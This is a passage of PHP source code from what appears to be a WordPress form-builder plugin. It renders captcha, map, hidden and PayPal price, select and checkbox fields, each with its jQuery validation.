              ';
              $onload_js.= 'captcha_refresh("wd_captcha", "'.$form_id.'");';
              break;
            }



			case 'type_arithmetic_captcha':
            {
              $params_names=array('w_field_label_size','w_field_label_pos', 'w_count', 'w_operations','w_class', 'w_input_size');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
			 
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
			  $param['w_count'] = $param['w_count'] ? $param['w_count'] : 1;
              $param['w_operations'] = $param['w_operations'] ? $param['w_operations'] : '+, -, *, /';
              $param['w_input_size'] = $param['w_input_size'] ? $param['w_input_size'] : 60;
   
              $rep ='<div type="type_arithmetic_captcha" class="wdform-field">
			  <div align="left" class="wdform-label-section" style="display:'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label" style="vertical-align: top;">'.$label.'</span></div><div class="wdform-element-section '.$param['w_class'].'" style="display: '.$param['w_field_label_pos2'].';"><div style="display: table;"><div style="display: table-row;"><div style="display: table-cell; vertical-align: middle;"><img type="captcha" operations_count="'.$param['w_count'].'" operations="'.$param['w_operations'].'" src="' . add_query_arg(array('action' => 'formcontactwdmathcaptcha', 'operations_count' => $param['w_count'], 'operations' => $param['w_operations'], 'i' => $form_id), admin_url('admin-ajax.php')) . '" id="wd_arithmetic_captcha'.$form_id.'" class="arithmetic_captcha_img" '.$param['attributes'].'></div><div style="display: table-cell;"><input type="text" class="arithmetic_captcha_input" id="wd_arithmetic_captcha_input'.$form_id.'" name="arithmetic_captcha_input" onkeypress="return check_isnum(event)" style="width: '.$param['w_input_size'].'px;" '.$param['attributes'].'/></div><div style="display: table-cell; vertical-align: middle;"><div class="captcha_refresh" id="_element_refresh'.$form_id.'" '.$param['attributes'].'></div></div></div></div></div></div>';
              
			  $onload_js .='jQuery("#wd_arithmetic_captcha'.$form_id.'").click(function() { captcha_refresh("wd_arithmetic_captcha","'.$form_id.'") });';
              $onload_js .='jQuery("#_element_refresh'.$form_id.'").click(function() {captcha_refresh("wd_arithmetic_captcha","'.$form_id.'")});';
              
              $check_js.='
              if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
              {
                if(jQuery("#wd_arithmetic_captcha_input'.$form_id.'").val()=="")
                {
                  alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                  old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                  x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                  jQuery("#wd_arithmetic_captcha_input'.$form_id.'").focus();
                  return false;
                }
              }
              ';
              $onload_js.= 'captcha_refresh("wd_arithmetic_captcha", "'.$form_id.'");';
              break;
            }

            
			case 'type_recaptcha': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_public','w_private','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
            
              $publickey= isset($fmc_settings['public_key']) ? $fmc_settings['public_key'] : '0';	

              $rep =' <script src="https://www.google.com/recaptcha/api.js"></script><div type="type_recaptcha" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span></div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';"><div class="g-recaptcha" data-sitekey="'.$publickey.'"></div></div></div>';
              break;
            }
            
            case 'type_hidden': {
              $params_names=array('w_name','w_value');
              $temp=$params;

              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $rep ='<div type="type_hidden" class="wdform-field"><div class="wdform-label-section" style="display: table-cell;"></div><div class="wdform-element-section" style="display: table-cell;"><input type="hidden" value="'.$param['w_value'].'" id="wdform_'.$id1.'_element'.$form_id.'" name="'.$param['w_name'].'" '.$param['attributes'].'></div></div>';
              break;
            }

            case 'type_mark_map': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_center_x','w_center_y','w_long','w_lat','w_zoom','w_width','w_height','w_info','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
            
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_width']) : max($param['w_field_label_size'], $param['w_width']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");

              $rep ='<div type="type_mark_map" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span></div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_width'].'px;"><input type="hidden" id="wdform_'.$id1.'_long'.$form_id.'" name="wdform_'.$id1.'_long'.$form_id.'" value="'.$param['w_long'].'"><input type="hidden" id="wdform_'.$id1.'_lat'.$form_id.'" name="wdform_'.$id1.'_lat'.$form_id.'" value="'.$param['w_lat'].'"><div id="wdform_'.$id1.'_element'.$form_id.'" long0="'.$param['w_long'].'" lat0="'.$param['w_lat'].'" zoom="'.$param['w_zoom'].'" info0="'.str_replace(array("\r\n", "\n", "\r"), '<br />', $param['w_info']).'" center_x="'.$param['w_center_x'].'" center_y="'.$param['w_center_y'].'" style="width: 100%; height: '.$param['w_height'].'px;" '.$param['attributes'].'></div></div></div>	';
              
              $onload_js .='if_gmap_init("wdform_'.$id1.'", '.$form_id.');';
              $onload_js .='add_marker_on_map("wdform_'.$id1.'", 0, "'.$param['w_long'].'", "'.$param['w_lat'].'", "'.str_replace(array("\r\n", "\n", "\r"), '<br />', $param['w_info']).'", '.$form_id.',true);';
              
              break;
            }
            
            case 'type_map': {
              $params_names=array('w_center_x','w_center_y','w_long','w_lat','w_zoom','w_width','w_height','w_info','w_class');
              $temp=$params;

              foreach($params_names as $params_name) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $marker='';
              $param['w_long']	= explode('***',$param['w_long']);
              $param['w_lat']	= explode('***',$param['w_lat']);
              $param['w_info']	= explode('***',$param['w_info']);
              foreach($param['w_long'] as $key => $w_long ) {
                $marker.='long'.$key.'="'.$w_long.'" lat'.$key.'="'.$param['w_lat'][$key].'" info'.$key.'="'.str_replace(array("\r\n", "\n", "\r"), '<br />', $param['w_info'][$key]).'"';
              }

              $rep ='<div type="type_map" class="wdform-field"  style="width:'.($param['w_width']).'px"><div class="wdform-label-section" style="display: table-cell;"><span id="wdform_'.$id1.'_element_label'.$form_id.'" style="display: none;">'.$label.'</span></div><div class="wdform-element-section '.$param['w_class'].'" style="width: '.$param['w_width'].'px;"><div id="wdform_'.$id1.'_element'.$form_id.'" zoom="'.$param['w_zoom'].'" center_x="'.$param['w_center_x'].'" center_y="'.$param['w_center_y'].'" style="width: 100%; height: '.$param['w_height'].'px;" '.$marker.' '.$param['attributes'].'></div></div></div>';
              
              $onload_js .='if_gmap_init("wdform_'.$id1.'", '.$form_id.');';
              
              foreach($param['w_long'] as $key => $w_long ) {
                $onload_js .='add_marker_on_map("wdform_'.$id1.'",'.$key.', "'.$w_long.'", "'.$param['w_lat'][$key].'", "'.str_replace(array("\r\n", "\n", "\r"), '<br />', $param['w_info'][$key]).'", '.$form_id.',false);';
              }
              break;
            }

            case 'type_paypal_price': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_first_val','w_title', 'w_mini_labels','w_size','w_required','w_hide_cents','w_class','w_range_min','w_range_max');
              $temp=$params;

              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              
              $w_first_val = explode('***',$param['w_first_val']);
              $w_title = explode('***',$param['w_title']);
      
              $param['w_first_val']=(isset($_POST['wdform_'.$id1.'_element_dollars'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_dollars'.$form_id])) : $w_first_val[0]).'***'.(isset($_POST['wdform_'.$id1.'_element_cents'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_cents'.$form_id])) : $w_first_val[1]);

              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $input_active = ($param['w_first_val']==$param['w_title'] ? "input_deactive" : "input_active");	
              $required = ($param['w_required']=="yes" ? true : false);	
              $hide_cents = ($param['w_hide_cents']=="yes" ? "none;" : "table-cell;");	
              
              $w_first_val = explode('***',$param['w_first_val']);
              $w_title = explode('***',$param['w_title']);
              $w_mini_labels = explode('***',$param['w_mini_labels']);
              
              $rep ='<div type="type_paypal_price" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';"><input type="hidden" value="'.$param['w_range_min'].'" name="wdform_'.$id1.'_range_min'.$form_id.'" id="wdform_'.$id1.'_range_min'.$form_id.'"><input type="hidden" value="'.$param['w_range_max'].'" name="wdform_'.$id1.'_range_max'.$form_id.'" id="wdform_'.$id1.'_range_max'.$form_id.'"><div id="wdform_'.$id1.'_table_price" style="display: table;"><div id="wdform_'.$id1.'_tr_price1" style="display: table-row;"><div id="wdform_'.$id1.'_td_name_currency" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;"><!--repstart-->&nbsp;'.$form_currency.'&nbsp;<!--repend--></span></div><div id="wdform_'.$id1.'_td_name_dollars" style="display: table-cell;"><input type="text" class="'.$input_active.'" id="wdform_'.$id1.'_element_dollars'.$form_id.'" name="wdform_'.$id1.'_element_dollars'.$form_id.'" value="'.$w_first_val[0].'" title="'.$w_title[0].'" onkeypress="return check_isnum(event)" style="width: '.$param['w_size'].'px;" '.$param['attributes'].'></div><div id="wdform_'.$id1.'_td_name_divider" style="display: '.$hide_cents.';"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;.&nbsp;</span></div><div id="wdform_'.$id1.'_td_name_cents" style="display: '.$hide_cents.'"><input type="text" class="'.$input_active.'" id="wdform_'.$id1.'_element_cents'.$form_id.'" name="wdform_'.$id1.'_element_cents'.$form_id.'" value="'.$w_first_val[1].'" title="'.$w_title[1].'" style="width: 30px;" '.$param['attributes'].'></div></div><div id="wdform_'.$id1.'_tr_price2" style="display: table-row;"><div style="display: table-cell;"><label class="mini_label"></label></div><div align="left" style="display: table-cell;"><label class="mini_label">'.$w_mini_labels[0].'</label></div><div id="wdform_'.$id1.'_td_name_label_divider" style="display: '.$hide_cents.'"><label class="mini_label"></label></div><div align="left" id="wdform_'.$id1.'_td_name_label_cents" style="display: '.$hide_cents.'"><label class="mini_label">'.$w_mini_labels[1].'</label></div></div></div></div></div>';
              
              $onload_js .='jQuery("#wdform_'.$id1.'_element_cents'.$form_id.'").blur(function() {add_0(this)});';
              $onload_js .='jQuery("#wdform_'.$id1.'_element_cents'.$form_id.'").keypress(function(event) {return check_isnum_interval(event,this,0,99)});';

              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").val()=="'.$w_title[0].'" || jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").focus();
                    return false;
                  }
                }
                ';
              }
              $check_js.='
              if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
              {
                dollars=0;
                cents=0;
              
                if(jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").val()!="'.$w_title[0].'" || jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").val())
                  dollars =jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").val();
                
                if(jQuery("#wdform_'.$id1.'_element_cents'.$form_id.'").val()!="'.$w_title[1].'" || jQuery("#wdform_'.$id1.'_element_cents'.$form_id.'").val())
                  cents =jQuery("#wdform_'.$id1.'_element_cents'.$form_id.'").val();

                var price=dollars+"."+cents;

                if(isNaN(price))
                {
                  alert("Invalid value of number field");
                  old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                  x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                  jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").focus();
                  return false;
                }
              
                var range_min='.($param['w_range_min'] ? $param['w_range_min'] : 0).';
                var range_max='.($param['w_range_max'] ? $param['w_range_max'] : -1).';

                
                if('.($required ? 'true' : 'false').' || jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").val()!="'.$w_title[0].'" || jQuery("#wdform_'.$id1.'_element_cents'.$form_id.'").val()!="'.$w_title[1].'")
                  if((range_max!=-1 && parseFloat(price)>range_max) || parseFloat(price)<range_min)
                  {		
                    alert("' . addslashes((__('The', 'form_maker')) . $label . (__('value must be between', 'form_maker')) . ($param['w_range_min'] ? $param['w_range_min'] : 0) . '-' . ($param['w_range_max'] ? $param['w_range_max'] : "any")) . '");

                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element_dollars'.$form_id.'").focus();
                    return false;
                  }
              }
              ';
              
              break;
            }
            
            case 'type_paypal_select': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_price','w_choices_checked', 'w_choices_disabled','w_required','w_quantity','w_quantity_value','w_class','w_property','w_property_values');
              $temp=$params;
			  if(strpos($temp, 'w_choices_params') > -1)
				$params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_price','w_choices_checked', 'w_choices_disabled','w_required','w_quantity', 'w_quantity_value', 'w_choices_params','w_class','w_property','w_property_values');
				
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_price']	= explode('***',$param['w_choices_price']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
              $param['w_choices_disabled']	= explode('***',$param['w_choices_disabled']);
              $param['w_property']	= explode('***',$param['w_property']);
              $param['w_property_values']	= explode('***',$param['w_property_values']);
			  
              if(isset($param['w_choices_params']))
				$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
				
              $post_value = isset($_POST['wdform_'.$id1."_element".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_element".$form_id])) : NULL;
             $rep='<div type="type_paypal_select" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
					if($required)
						$rep.='<span class="wdform-required">'.$required_sym.'</span>';
					$rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size'].'px;"><select id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" style="width: 100%;"  '.$param['attributes'].'>';
					foreach($param['w_choices'] as $key => $choice)
					{		
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
					
							$choices_labels =array();
							$choices_values =array();
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
							
							
							
							$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));
							$table = $label_table_and_column[0];
							$label_column = $label_table_and_column[1];
							if($label_column)
							{
								 
								$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);					
							}	

							$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_price'][$key]));
							$value_column = $param['w_choices_disabled'][$key]=="true" ? '' : $value_table_and_column[1];

							if($value_column)
							{
								$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);
							}		
							
							$columns_count = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);
							
							for($k=0; $k<$columns_count; $k++)
							{
								$choice_label = isset($choices_labels[$k]) ? $choices_labels[$k] : '';
								$choice_value = isset($choices_values[$k]) ? (float)$choices_values[$k][0] : '';
								
								if(isset($post_value))
								{							
									if($post_value==$choice_value && $choice_label==$_REQUEST["wdform_".$id1."_element_label".$form_id])
										$param['w_choices_checked'][$key]='selected="selected"';
									else
										$param['w_choices_checked'][$key]='';
								}	
								else
									$param['w_choices_checked'][$key]=(($param['w_choices_checked'][$key]=='true' && $k == 0) ? 'selected="selected"' : '');

								$rep.='<option value="'.$choice_value.'" '.$param['w_choices_checked'][$key].'>'.$choice_label[0].'</option>';
							}			
						}
						else
						{
							$choice_value = $param['w_choices_disabled'][$key]=="true" ? '' : $param['w_choices_price'][$key];
						
							if(isset($post_value))
							{	
								if($post_value==$choice_value && $choice==$_REQUEST["wdform_".$id1."_element_label".$form_id])
									$param['w_choices_checked'][$key]='selected="selected"';
								else
									$param['w_choices_checked'][$key]='';	
							}	
							else	
							{
								if($param['w_choices_checked'][$key]=='true')
									$param['w_choices_checked'][$key]='selected="selected"';
								else
									$param['w_choices_checked'][$key]='';
							}
							
							$rep.='<option value="'.$choice_value.'" '.$param['w_choices_checked'][$key].'>'.$choice.'</option>';
						}	
					}
              $rep.='</select><div id="wdform_'.$id1.'_div'.$form_id.'">';
              if($param['w_quantity']=="yes") {
                $rep.='<div class="paypal-property"><label class="mini_label" style="margin: 0px 5px;">'.(__("Quantity", 'form_maker')).'</label><input type="text" value="'.(isset($_POST['wdform_'.$id1."_element_quantity".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_element_quantity".$form_id])) : $param['w_quantity_value']).'" id="wdform_'.$id1.'_element_quantity'.$form_id.'" name="wdform_'.$id1.'_element_quantity'.$form_id.'" class="wdform-quantity"></div>';
              }
              if($param['w_property'][0]) {
                foreach($param['w_property'] as $key => $property) {
                  $rep.='
                  <div id="wdform_'.$id1.'_property_'.$key.'" class="paypal-property">
                  <div style="width:150px; display:inline-block;">
                  <label class="mini_label" id="wdform_'.$id1.'_property_label_'.$form_id.''.$key.'" style="margin-right: 5px;">'.$property.'</label>
                  <select id="wdform_'.$id1.'_property'.$form_id.''.$key.'" name="wdform_'.$id1.'_property'.$form_id.''.$key.'" style="margin: 2px 0px;">';
                  $param['w_property_values'][$key]	= explode('###',$param['w_property_values'][$key]);
                  $param['w_property_values'][$key]	= array_slice($param['w_property_values'][$key],1, count($param['w_property_values'][$key]));   
                  foreach($param['w_property_values'][$key] as $subkey => $property_value) {
                    $rep.='<option id="wdform_'.$id1.'_'.$key.'_option'.$subkey.'" value="'.$property_value.'" '.(isset($_POST['wdform_'.$id1.'_property'.$form_id.''.$key]) && esc_html(stripslashes($_POST['wdform_'.$id1.'_property'.$form_id.''.$key])) == $property_value ? 'selected="selected"' : "").'>'.$property_value.'</option>';
                  }
                  $rep.='</select></div></div>';
                }
              }
              $rep.='</div></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';	
              }
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_label'.$form_id.'\"  />").val(jQuery("#wdform_'.$id1.'_element'.$form_id.' option:selected").text()).appendTo("#form'.$form_id.'");
                ';
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_quantity_label'.$form_id.'\"  />").val("'.(__("Quantity", 'form_maker')).'").appendTo("#form'.$form_id.'");
                ';
              foreach($param['w_property'] as $key => $property)
              {	
                $onsubmit_js.='
                  jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_element_property_label'.$form_id.$key.'\"  />").val("'.$property.'").appendTo("#form'.$form_id.'");
                  ';
                  
              }
              break;
            }
            
            case 'type_paypal_checkbox': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num','w_class','w_property','w_property_values','w_quantity','w_quantity_value');
              $temp=$params;
			  if(strpos($temp, 'w_field_option_pos') > -1)
				$params_names=array('w_field_label_size','w_field_label_pos', 'w_field_option_pos','w_flow','w_choices','w_choices_price','w_choices_checked','w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_choices_params', 'w_class','w_property','w_property_values','w_quantity','w_quantity_value');	
				
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
			  if(!isset($param['w_field_option_pos']))
				$param['w_field_option_pos'] = 'left';
				
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
			  $param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none 
			  !important;'" : "");
			  $param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin:3px 8px 0 0 !important; display: inline-block !important;'" : "");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_price']	= explode('***',$param['w_choices_price']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
              $param['w_property']	= explode('***',$param['w_property']);
              $param['w_property_values']	= explode('***',$param['w_property_values']);
			  if(isset($param['w_choices_params']))
				$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
				
              foreach($param['w_choices_checked'] as $key => $choices_checked ) {
                $param['w_choices_checked'][$key]=($choices_checked=='true' ? 'checked="checked"' : '');
              }
              $rep='<div type="type_paypal_checkbox" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';">';
              $total_queries = 0;
              foreach($param['w_choices'] as $key => $choice)
					{	
						$key1 = $key + $total_queries;
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
						
							
							
							$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));
							$table = $label_table_and_column[0];
							$label_column = $label_table_and_column[1];
							if($label_column)
							{
								$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);				
							}	

							$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_price'][$key]));
							$value_column = $value_table_and_column[1];

							if($value_column)
							{
								$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);
							}		
							
							$columns_count = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);
							
							if(array_filter($choices_labels) || array_filter($choices_values))
							{
								$total_queries = $total_queries + $columns_count-1;
								if(!isset($post_value))
									$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');
									
								for($k=0; $k<$columns_count; $k++)
								{
									$choice_label = isset($choices_labels) ? $choices_labels[$k] : '';
									$choice_value = isset($choices_values) ? (float)$choices_values[$k][0] : '';
									
									if(isset($post_value))
									{	
										$param['w_choices_checked'][$key]="";
										$checkedvalue = $_REQUEST['wdform_'.$id1."_element".$form_id.($key1+$k)];

										if(isset($checkedvalue))
											$param['w_choices_checked'][$key]='checked="checked"';							
									}

									$rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" '.$param['w_field_option_pos1'].'>'.$choice_label[0].'</label><div class="checkbox-div forlabs" '.$param['w_field_option_pos2'].'><input type="checkbox" id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" value="'.$choice_value.'" title="'.htmlspecialchars($choice_label[0]).'" '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div><input type="hidden" name="wdform_'.$id1.'_element'.$form_id.($key1+$k).'_label" value="'.htmlspecialchars($choice_label[0]).'" /></div>';
								}
							}	
						}
						else
						{
							if(isset($post_value))
							{
								$param['w_choices_checked'][$key]="";
